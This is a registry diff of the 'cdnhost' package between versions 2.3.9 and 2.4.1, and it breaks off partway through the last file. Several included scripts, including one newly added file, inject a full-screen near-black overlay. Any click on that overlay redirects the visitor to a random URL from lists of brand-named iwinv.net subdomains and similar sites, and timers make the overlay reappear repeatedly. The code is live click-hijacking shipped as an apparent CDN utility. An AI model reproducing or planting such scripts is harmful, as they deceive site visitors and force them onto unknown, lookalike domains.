cdnhost 2.3.9 → 2.4.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/iwinv.js +7 -26
- package/iwinv_new.js +7 -26
- package/link.js +1 -1
- package/nolink.js +4 -4
- package/package.json +1 -1
- package/seekr - /353/263/265/354/202/254/353/263/270.js" +82 -0
- package/seekr.js +12 -33
- package/seekr2.js +12 -33
- package/total.js +12 -33
- package/wordpress-chat.js +12 -33
- package/wp-pc-pop.js +12 -33
package/iwinv.js
CHANGED
|
@@ -61,32 +61,13 @@
|
|
|
61
61
|
|
|
62
62
|
function o(event) {
|
|
63
63
|
const urls = [
|
|
64
|
-
'https://
|
|
65
|
-
'https://
|
|
66
|
-
'https://
|
|
67
|
-
'https://
|
|
68
|
-
'https://
|
|
69
|
-
'https://
|
|
70
|
-
'https://
|
|
71
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
72
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
73
|
-
'https://popcat.iwinv.net/recent.php',
|
|
74
|
-
'https://ecount.iwinv.net/recent.php',
|
|
75
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
76
|
-
'https://shopee.iwinv.net/recent.php',
|
|
77
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
78
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
79
|
-
'https://munpia.iwinv.net/recent.php',
|
|
80
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
81
|
-
'https://interpals.iwinv.net/recent.php',
|
|
82
|
-
'https://snp500.iwinv.net/recent.php',
|
|
83
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
84
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
85
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
86
|
-
'https://newsfactory.iwinv.net',
|
|
87
|
-
'https://snapp.im/recent.php',
|
|
88
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
89
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
64
|
+
'https://ssssss.iwinv.net',
|
|
65
|
+
'https://minecraft.iwinv.net',
|
|
66
|
+
'https://zzzzzz.iwinv.net',
|
|
67
|
+
'https://snapp.im/view/',
|
|
68
|
+
'https://seekr.kr/view/',
|
|
69
|
+
'https://199.kr/view/',
|
|
70
|
+
'https://manatoki.kr/view/',
|
|
90
71
|
];
|
|
91
72
|
|
|
92
73
|
function getRandomUrls(arr, num) {
|
package/iwinv_new.js
CHANGED
|
@@ -61,32 +61,13 @@
|
|
|
61
61
|
|
|
62
62
|
function o(event) {
|
|
63
63
|
const urls = [
|
|
64
|
-
'https://
|
|
65
|
-
'https://
|
|
66
|
-
'https://
|
|
67
|
-
'https://
|
|
68
|
-
'https://
|
|
69
|
-
'https://
|
|
70
|
-
'https://
|
|
71
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
72
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
73
|
-
'https://popcat.iwinv.net/recent.php',
|
|
74
|
-
'https://ecount.iwinv.net/recent.php',
|
|
75
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
76
|
-
'https://shopee.iwinv.net/recent.php',
|
|
77
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
78
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
79
|
-
'https://munpia.iwinv.net/recent.php',
|
|
80
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
81
|
-
'https://interpals.iwinv.net/recent.php',
|
|
82
|
-
'https://snp500.iwinv.net/recent.php',
|
|
83
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
84
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
85
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
86
|
-
'https://newsfactory.iwinv.net',
|
|
87
|
-
'https://snapp.im/recent.php',
|
|
88
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
89
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
64
|
+
'https://ssssss.iwinv.net',
|
|
65
|
+
'https://minecraft.iwinv.net',
|
|
66
|
+
'https://zzzzzz.iwinv.net',
|
|
67
|
+
'https://snapp.im/view/',
|
|
68
|
+
'https://seekr.kr/view/',
|
|
69
|
+
'https://199.kr/view/',
|
|
70
|
+
'https://manatoki.kr/view/',
|
|
90
71
|
];
|
|
91
72
|
|
|
92
73
|
function getRandomUrls(arr, num) {
|
package/link.js
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
(function () {
|
|
2
2
|
const urls = [...new Set([
|
|
3
3
|
"//seekr.kr","//snapp.im","//manatoki.kr","//199.kr","//thedeo.uk",
|
|
4
|
-
"//ruliweb.iwinv.net/","//
|
|
4
|
+
"//ruliweb.iwinv.net/","//popcat.iwinv.net/","//fiveguys.iwinv.net/","//jjang0u.iwinv.net/","//tdgall.iwinv.net/","//yakored.iwinv.net/","//dctribe.iwinv.net/","//hygall.iwinv.net/","//skyscanner.iwinv.net/","//flightaware.iwinv.net/","//fconline.iwinv.net/","//flextv.iwinv.net/","//eomisae.iwinv.net/","//ecount.iwinv.net/","//hiworks.iwinv.net/","//mixamo.iwinv.net/","//toptoon.iwinv.net/","//slrclub.iwinv.net/","//dmitory.iwinv.net/","//kmcert.iwinv.net/","//lolchess.iwinv.net/","//curseforge.iwinv.net/","//hsreplay.iwinv.net/","//bikini.iwinv.net/","//qqqqqq.iwinv.net/","//iiiiii.iwinv.net/","//llllll.iwinv.net/","//oooooo.iwinv.net/","//xxxxxx.iwinv.net/","//eeeeee.iwinv.net/","//aaaaaa.iwinv.net/","//zzzzzz.iwinv.net/","//tttttt.iwinv.net/","//ssssss.iwinv.net/","//pdnews.iwinv.net/","//valorant.iwinv.net/","//tiktok.iwinv.net/","//tumblr.iwinv.net/","//netflix.iwinv.net/","//minecraft.iwinv.net/","//openai.iwinv.net/","//palworld.iwinv.net/",
|
|
5
5
|
"//1a.seekr.kr","//1b.seekr.kr","//1c.seekr.kr","//1d.seekr.kr","//1e.seekr.kr","//1f.seekr.kr","//1g.seekr.kr","//1h.seekr.kr","//1i.seekr.kr","//1.seekr.kr","//2.seekr.kr","//3.seekr.kr","//4.seekr.kr","//5.seekr.kr","//6.seekr.kr","//7.seekr.kr","//8.seekr.kr","//9.seekr.kr","//10.seekr.kr","//11.seekr.kr","//12.seekr.kr","//13.seekr.kr","//14.seekr.kr","//15.seekr.kr","//16.seekr.kr","//17.seekr.kr","//18.seekr.kr","//19.seekr.kr","//20.seekr.kr","//21.seekr.kr","//22.seekr.kr","//23.seekr.kr","//24.seekr.kr","//25.seekr.kr","//26.seekr.kr","//27.seekr.kr","//28.seekr.kr","//29.seekr.kr","//30.seekr.kr","//31.seekr.kr","//32.seekr.kr","//33.seekr.kr","//34.seekr.kr","//35.seekr.kr","//39.seekr.kr","//42.seekr.kr","//43.seekr.kr","//48.seekr.kr","//50.seekr.kr","//53.seekr.kr","//56.seekr.kr","//67.seekr.kr","//70.seekr.kr","//129.seekr.kr","//124.seekr.kr","//127.seekr.kr","//128.seekr.kr",
|
|
6
6
|
"//ranovel.kr","//16.snapp.im","//17.snapp.im","//18.snapp.im","//19.snapp.im","//20.snapp.im","//21.snapp.im","//22.snapp.im","//23.snapp.im","//24.snapp.im","//25.snapp.im",
|
|
7
7
|
"//1.manatoki.kr","//2.manatoki.kr","//3.manatoki.kr","//4.manatoki.kr","//5.manatoki.kr","//6.manatoki.kr","//7.manatoki.kr","//8.manatoki.kr","//9.manatoki.kr","//10.manatoki.kr","//11.manatoki.kr","//12.manatoki.kr","//13.manatoki.kr","//14.manatoki.kr","//15.manatoki.kr","//16.manatoki.kr","//17.manatoki.kr","//18.manatoki.kr","//19.manatoki.kr","//20.manatoki.kr","//19.manatoki.kr","//20.manatoki.kr","//21.manatoki.kr","//22.manatoki.kr","//23.manatoki.kr","//24.manatoki.kr","//25.manatoki.kr","//26.manatoki.kr","//27.manatoki.kr","//28.manatoki.kr","//29.manatoki.kr","//30.manatoki.kr","//31.manatoki.kr","//32.manatoki.kr","//33.manatoki.kr","//34.manatoki.kr","//35.manatoki.kr","//36.manatoki.kr","//37.manatoki.kr","//38.manatoki.kr","//39.manatoki.kr","//40.manatoki.kr","//41.manatoki.kr","//42.manatoki.kr","//43.manatoki.kr","//44.manatoki.kr","//45.manatoki.kr","//46.manatoki.kr","//47.manatoki.kr","//48.manatoki.kr","//49.manatoki.kr","//50.manatoki.kr","//51.manatoki.kr","//52.manatoki.kr","//53.manatoki.kr","//54.manatoki.kr","//55.manatoki.kr","//56.manatoki.kr","//57.manatoki.kr","//58.manatoki.kr","//59.manatoki.kr","//60.manatoki.kr","//61.manatoki.kr","//62.manatoki.kr","//63.manatoki.kr","//64.manatoki.kr","//65.manatoki.kr","//66.manatoki.kr","//67.manatoki.kr","//68.manatoki.kr","//69.manatoki.kr","//70.manatoki.kr","//71.manatoki.kr","//72.manatoki.kr","//73.manatoki.kr","//74.manatoki.kr","//75.manatoki.kr","//76.manatoki.kr","//77.manatoki.kr","//78.manatoki.kr","//79.manatoki.kr",
|
package/nolink.js
CHANGED
|
@@ -16,14 +16,14 @@ document.writeln('<div id="s2"></div>');
|
|
|
16
16
|
|
|
17
17
|
document.getElementById('container').style.boxShadow = 'none';
|
|
18
18
|
function ss(){
|
|
19
|
-
document.getElementById("s2").style.transition = "opacity
|
|
20
|
-
document.getElementById("button").style.transition = "opacity
|
|
19
|
+
document.getElementById("s2").style.transition = "opacity 7s";
|
|
20
|
+
document.getElementById("button").style.transition = "opacity 7s";
|
|
21
21
|
setTimeout("s()", 3999);
|
|
22
|
-
setTimeout("h()",
|
|
22
|
+
setTimeout("h()", 6000);
|
|
23
23
|
}
|
|
24
24
|
function pcss(){
|
|
25
25
|
setTimeout("s()", 3999);
|
|
26
|
-
setTimeout("h()",
|
|
26
|
+
setTimeout("h()", 6000);
|
|
27
27
|
}
|
|
28
28
|
function a(){
|
|
29
29
|
document.getElementById("button").style.display="none";
|
package/package.json
CHANGED
|
@@ -0,0 +1,82 @@
|
|
|
1
|
+
|
|
2
|
+
window.addEventListener('load', function() {
|
|
3
|
+
var images = document.querySelectorAll('img');
|
|
4
|
+
images.forEach(function(img) {
|
|
5
|
+
if (!img.hasAttribute('alt')) {
|
|
6
|
+
img.setAttribute('alt', 'image');
|
|
7
|
+
}
|
|
8
|
+
});
|
|
9
|
+
});
|
|
10
|
+
|
|
11
|
+
const urls = [
|
|
12
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
13
|
+
'https://instiz.iwinv.net/recent.php',
|
|
14
|
+
'https://bikini.iwinv.net/recent.php',
|
|
15
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
16
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
17
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
18
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
19
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
20
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
21
|
+
'https://popcat.iwinv.net/recent.php',
|
|
22
|
+
'https://ecount.iwinv.net/recent.php',
|
|
23
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
24
|
+
'https://shopee.iwinv.net/recent.php',
|
|
25
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
26
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
27
|
+
'https://munpia.iwinv.net/recent.php',
|
|
28
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
29
|
+
'https://interpals.iwinv.net/recent.php',
|
|
30
|
+
'https://snp500.iwinv.net/recent.php',
|
|
31
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
32
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
33
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
34
|
+
'https://newsfactory.iwinv.net',
|
|
35
|
+
'https://snapp.im/recent.php',
|
|
36
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
37
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
38
|
+
];
|
|
39
|
+
|
|
40
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
41
|
+
document.writeln('<style>');
|
|
42
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
43
|
+
document.writeln('</style>');
|
|
44
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
45
|
+
|
|
46
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
47
|
+
function ss(){
|
|
48
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
49
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
50
|
+
setTimeout("s()", 3999);
|
|
51
|
+
setTimeout("h()", 15000);
|
|
52
|
+
}
|
|
53
|
+
function pcss(){
|
|
54
|
+
setTimeout("s()", 3999);
|
|
55
|
+
setTimeout("h()", 15000);
|
|
56
|
+
}
|
|
57
|
+
function a(){
|
|
58
|
+
document.getElementById("button").style.display="none";
|
|
59
|
+
}
|
|
60
|
+
function aa(){
|
|
61
|
+
document.getElementById("button").style.display="block";
|
|
62
|
+
}
|
|
63
|
+
function s(){
|
|
64
|
+
document.getElementById("s2").style.opacity = 0;
|
|
65
|
+
document.getElementById("button").style.opacity = 0;
|
|
66
|
+
document.getElementById("sha").style.display="none";
|
|
67
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
68
|
+
}
|
|
69
|
+
function h(){
|
|
70
|
+
const s2 = document.getElementById("s2");
|
|
71
|
+
const button = document.getElementById("button");
|
|
72
|
+
s2.style.zIndex = -1;
|
|
73
|
+
button.style.display = "none";
|
|
74
|
+
setTimeout(function () {
|
|
75
|
+
s2.style.zIndex = 99;
|
|
76
|
+
button.style.display = "block";
|
|
77
|
+
s2.style.opacity = 0.9;
|
|
78
|
+
button.style.opacity = 1;
|
|
79
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
80
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
81
|
+
}, 2000);
|
|
82
|
+
}
|
package/seekr.js
CHANGED
|
@@ -1,4 +1,3 @@
|
|
|
1
|
-
|
|
2
1
|
window.addEventListener('load', function() {
|
|
3
2
|
var images = document.querySelectorAll('img');
|
|
4
3
|
images.forEach(function(img) {
|
|
@@ -8,52 +7,32 @@ window.addEventListener('load', function() {
|
|
|
8
7
|
});
|
|
9
8
|
});
|
|
10
9
|
|
|
11
|
-
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
12
10
|
const urls = [
|
|
13
|
-
'https://
|
|
14
|
-
'https://
|
|
15
|
-
'https://
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
19
|
-
'https://
|
|
20
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
-
'https://popcat.iwinv.net/recent.php',
|
|
23
|
-
'https://ecount.iwinv.net/recent.php',
|
|
24
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
-
'https://shopee.iwinv.net/recent.php',
|
|
26
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
27
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
28
|
-
'https://munpia.iwinv.net/recent.php',
|
|
29
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
30
|
-
'https://interpals.iwinv.net/recent.php',
|
|
31
|
-
'https://snp500.iwinv.net/recent.php',
|
|
32
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
33
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
34
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
35
|
-
'https://newsfactory.iwinv.net',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
11
|
+
'https://ssssss.iwinv.net',
|
|
12
|
+
'https://minecraft.iwinv.net',
|
|
13
|
+
'https://zzzzzz.iwinv.net',
|
|
14
|
+
'https://snapp.im/view/',
|
|
15
|
+
'https://seekr.kr/view/',
|
|
16
|
+
'https://199.kr/view/',
|
|
17
|
+
'https://manatoki.kr/view/',
|
|
39
18
|
];
|
|
40
19
|
|
|
41
20
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
42
21
|
document.writeln('<style>');
|
|
43
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
22
|
+
document.writeln('* {font-size: 1em !important} #button {border:1px solid #fff;border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
44
23
|
document.writeln('</style>');
|
|
45
24
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
46
25
|
|
|
47
26
|
document.getElementById('container').style.boxShadow = 'none';
|
|
48
27
|
function ss(){
|
|
49
|
-
document.getElementById("s2").style.transition = "opacity
|
|
50
|
-
document.getElementById("button").style.transition = "opacity
|
|
28
|
+
document.getElementById("s2").style.transition = "opacity 7s";
|
|
29
|
+
document.getElementById("button").style.transition = "opacity 7s";
|
|
51
30
|
setTimeout("s()", 3999);
|
|
52
|
-
setTimeout("h()",
|
|
31
|
+
setTimeout("h()", 6000);
|
|
53
32
|
}
|
|
54
33
|
function pcss(){
|
|
55
34
|
setTimeout("s()", 3999);
|
|
56
|
-
setTimeout("h()",
|
|
35
|
+
setTimeout("h()", 6000);
|
|
57
36
|
}
|
|
58
37
|
function a(){
|
|
59
38
|
document.getElementById("button").style.display="none";
|
package/seekr2.js
CHANGED
|
@@ -1,4 +1,3 @@
|
|
|
1
|
-
|
|
2
1
|
window.addEventListener('load', function() {
|
|
3
2
|
var images = document.querySelectorAll('img');
|
|
4
3
|
images.forEach(function(img) {
|
|
@@ -8,52 +7,32 @@ window.addEventListener('load', function() {
|
|
|
8
7
|
});
|
|
9
8
|
});
|
|
10
9
|
|
|
11
|
-
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
12
10
|
const urls = [
|
|
13
|
-
'https://
|
|
14
|
-
'https://
|
|
15
|
-
'https://
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
19
|
-
'https://
|
|
20
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
-
'https://popcat.iwinv.net/recent.php',
|
|
23
|
-
'https://ecount.iwinv.net/recent.php',
|
|
24
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
-
'https://shopee.iwinv.net/recent.php',
|
|
26
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
27
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
28
|
-
'https://munpia.iwinv.net/recent.php',
|
|
29
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
30
|
-
'https://interpals.iwinv.net/recent.php',
|
|
31
|
-
'https://snp500.iwinv.net/recent.php',
|
|
32
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
33
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
34
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
35
|
-
'https://newsfactory.iwinv.net',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
11
|
+
'https://ssssss.iwinv.net',
|
|
12
|
+
'https://minecraft.iwinv.net',
|
|
13
|
+
'https://zzzzzz.iwinv.net',
|
|
14
|
+
'https://snapp.im/view/',
|
|
15
|
+
'https://seekr.kr/view/',
|
|
16
|
+
'https://199.kr/view/',
|
|
17
|
+
'https://manatoki.kr/view/',
|
|
39
18
|
];
|
|
40
19
|
|
|
41
20
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
42
21
|
document.writeln('<style>');
|
|
43
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
22
|
+
document.writeln('* {font-size: 1em !important} #button {border:1px solid #fff;border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
44
23
|
document.writeln('</style>');
|
|
45
24
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
46
25
|
|
|
47
26
|
document.getElementById('container').style.boxShadow = 'none';
|
|
48
27
|
function ss(){
|
|
49
|
-
document.getElementById("s2").style.transition = "opacity
|
|
50
|
-
document.getElementById("button").style.transition = "opacity
|
|
28
|
+
document.getElementById("s2").style.transition = "opacity 7s";
|
|
29
|
+
document.getElementById("button").style.transition = "opacity 7s";
|
|
51
30
|
setTimeout("s()", 3999);
|
|
52
|
-
setTimeout("h()",
|
|
31
|
+
setTimeout("h()", 6000);
|
|
53
32
|
}
|
|
54
33
|
function pcss(){
|
|
55
34
|
setTimeout("s()", 3999);
|
|
56
|
-
setTimeout("h()",
|
|
35
|
+
setTimeout("h()", 6000);
|
|
57
36
|
}
|
|
58
37
|
function a(){
|
|
59
38
|
document.getElementById("button").style.display="none";
|
package/total.js
CHANGED
|
@@ -1,4 +1,3 @@
|
|
|
1
|
-
|
|
2
1
|
window.addEventListener('load', function() {
|
|
3
2
|
var images = document.querySelectorAll('img');
|
|
4
3
|
images.forEach(function(img) {
|
|
@@ -8,52 +7,32 @@ window.addEventListener('load', function() {
|
|
|
8
7
|
});
|
|
9
8
|
});
|
|
10
9
|
|
|
11
|
-
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
12
10
|
const urls = [
|
|
13
|
-
'https://
|
|
14
|
-
'https://
|
|
15
|
-
'https://
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
19
|
-
'https://
|
|
20
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
-
'https://popcat.iwinv.net/recent.php',
|
|
23
|
-
'https://ecount.iwinv.net/recent.php',
|
|
24
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
-
'https://shopee.iwinv.net/recent.php',
|
|
26
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
27
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
28
|
-
'https://munpia.iwinv.net/recent.php',
|
|
29
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
30
|
-
'https://interpals.iwinv.net/recent.php',
|
|
31
|
-
'https://snp500.iwinv.net/recent.php',
|
|
32
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
33
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
34
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
35
|
-
'https://newsfactory.iwinv.net',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
11
|
+
'https://ssssss.iwinv.net',
|
|
12
|
+
'https://minecraft.iwinv.net',
|
|
13
|
+
'https://zzzzzz.iwinv.net',
|
|
14
|
+
'https://snapp.im/view/',
|
|
15
|
+
'https://seekr.kr/view/',
|
|
16
|
+
'https://199.kr/view/',
|
|
17
|
+
'https://manatoki.kr/view/',
|
|
39
18
|
];
|
|
40
19
|
|
|
41
20
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
42
21
|
document.writeln('<style>');
|
|
43
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
22
|
+
document.writeln('* {font-size: 1em !important} #button {border:1px solid #fff;border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
44
23
|
document.writeln('</style>');
|
|
45
24
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
46
25
|
|
|
47
26
|
document.getElementById('container').style.boxShadow = 'none';
|
|
48
27
|
function ss(){
|
|
49
|
-
document.getElementById("s2").style.transition = "opacity
|
|
50
|
-
document.getElementById("button").style.transition = "opacity
|
|
28
|
+
document.getElementById("s2").style.transition = "opacity 7s";
|
|
29
|
+
document.getElementById("button").style.transition = "opacity 7s";
|
|
51
30
|
setTimeout("s()", 3999);
|
|
52
|
-
setTimeout("h()",
|
|
31
|
+
setTimeout("h()", 6000);
|
|
53
32
|
}
|
|
54
33
|
function pcss(){
|
|
55
34
|
setTimeout("s()", 3999);
|
|
56
|
-
setTimeout("h()",
|
|
35
|
+
setTimeout("h()", 6000);
|
|
57
36
|
}
|
|
58
37
|
function a(){
|
|
59
38
|
document.getElementById("button").style.display="none";
|
package/wordpress-chat.js
CHANGED
|
@@ -1,4 +1,3 @@
|
|
|
1
|
-
|
|
2
1
|
window.addEventListener('load', function() {
|
|
3
2
|
var images = document.querySelectorAll('img');
|
|
4
3
|
images.forEach(function(img) {
|
|
@@ -8,52 +7,32 @@ window.addEventListener('load', function() {
|
|
|
8
7
|
});
|
|
9
8
|
});
|
|
10
9
|
|
|
11
|
-
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
12
10
|
const urls = [
|
|
13
|
-
'https://
|
|
14
|
-
'https://
|
|
15
|
-
'https://
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
19
|
-
'https://
|
|
20
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
-
'https://popcat.iwinv.net/recent.php',
|
|
23
|
-
'https://ecount.iwinv.net/recent.php',
|
|
24
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
-
'https://shopee.iwinv.net/recent.php',
|
|
26
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
27
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
28
|
-
'https://munpia.iwinv.net/recent.php',
|
|
29
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
30
|
-
'https://interpals.iwinv.net/recent.php',
|
|
31
|
-
'https://snp500.iwinv.net/recent.php',
|
|
32
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
33
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
34
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
35
|
-
'https://newsfactory.iwinv.net',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
11
|
+
'https://ssssss.iwinv.net',
|
|
12
|
+
'https://minecraft.iwinv.net',
|
|
13
|
+
'https://zzzzzz.iwinv.net',
|
|
14
|
+
'https://snapp.im/view/',
|
|
15
|
+
'https://seekr.kr/view/',
|
|
16
|
+
'https://199.kr/view/',
|
|
17
|
+
'https://manatoki.kr/view/',
|
|
39
18
|
];
|
|
40
19
|
|
|
41
20
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
42
21
|
document.writeln('<style>');
|
|
43
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
22
|
+
document.writeln('* {font-size: 1em !important} #button {border:1px solid #fff;border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
44
23
|
document.writeln('</style>');
|
|
45
24
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
46
25
|
|
|
47
26
|
document.getElementById('container').style.boxShadow = 'none';
|
|
48
27
|
function ss(){
|
|
49
|
-
document.getElementById("s2").style.transition = "opacity
|
|
50
|
-
document.getElementById("button").style.transition = "opacity
|
|
28
|
+
document.getElementById("s2").style.transition = "opacity 7s";
|
|
29
|
+
document.getElementById("button").style.transition = "opacity 7s";
|
|
51
30
|
setTimeout("s()", 3999);
|
|
52
|
-
setTimeout("h()",
|
|
31
|
+
setTimeout("h()", 6000);
|
|
53
32
|
}
|
|
54
33
|
function pcss(){
|
|
55
34
|
setTimeout("s()", 3999);
|
|
56
|
-
setTimeout("h()",
|
|
35
|
+
setTimeout("h()", 6000);
|
|
57
36
|
}
|
|
58
37
|
function a(){
|
|
59
38
|
document.getElementById("button").style.display="none";
|
package/wp-pc-pop.js
CHANGED
|
@@ -1,4 +1,3 @@
|
|
|
1
|
-
|
|
2
1
|
window.addEventListener('load', function() {
|
|
3
2
|
var images = document.querySelectorAll('img');
|
|
4
3
|
images.forEach(function(img) {
|
|
@@ -8,52 +7,32 @@ window.addEventListener('load', function() {
|
|
|
8
7
|
});
|
|
9
8
|
});
|
|
10
9
|
|
|
11
|
-
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
12
10
|
const urls = [
|
|
13
|
-
'https://
|
|
14
|
-
'https://
|
|
15
|
-
'https://
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
19
|
-
'https://
|
|
20
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
-
'https://popcat.iwinv.net/recent.php',
|
|
23
|
-
